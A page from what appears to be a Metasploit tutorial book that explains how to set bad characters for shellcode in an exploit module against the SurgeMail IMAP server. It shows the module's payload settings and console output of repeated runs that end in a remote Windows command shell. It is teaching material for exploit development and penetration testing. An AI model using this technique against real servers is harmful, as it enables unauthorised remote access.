background image

Creating Your Own Exploits

211

mangled and marking that character as bad. One of the fastest methods, 
however, is to find the bad characters in the source code of similar exploits. 
For example, a search of the IMAP exploits as of this writing finds 

\x00\x09\

x0a\x0b\x0c\x0d\x20\x2c\x3a\x40\x7b

 listed as bad characters, as shown next:

'Privileged'     => false,
'DefaultOptions' =>

{

'EXITFUNC' => 'thread',

},

'Payload'         =>

{

'Space'       => 10351,
'DisableNops' => true,

'BadChars'    => "\x00\x09\x0a\x0b\x0c\x0d\x20\x2c\x3a\x40\x7b"

},

'Platform'        => 'win',
'Targets'        =>

When you declare 

'BadChars'

 in an exploit module, Metasploit will auto-

matically exclude them from shellcode and from any automatically generated 
strings of text or NOPs.

When we run the exploit again, as shown next, after declaring bad char-

acters, we finally get a session on the third try. The exploit still isn’t reliable, 
but it works because Metasploit dynamically changes the shellcode each time 
the exploit is run. As a result, the characters that are causing the module to 
fail may not always be present.

msf exploit(surgemail_book) > 

rexploit

[*] Started bind handler
[*] Authenticating as test with password test...
[*] Sending payload
[*] Exploit completed, but no session was created.
msf exploit(surgemail_book) > 

rexploit

[*] Started bind handler
[*] Authenticating as test with password test...
[*] Sending payload
[*] Exploit completed, but no session was created.
msf exploit(surgemail_book) > 

rexploit

[*] Started bind handler
[*] Authenticating as test with password test...
[*] Sending payload
[*] Command shell session 1 opened (192.168.1.101:59501 -> 192.168.1.155:4444)

(C) Copyright 1985-2001 Microsoft Corp.

c:\surgemail>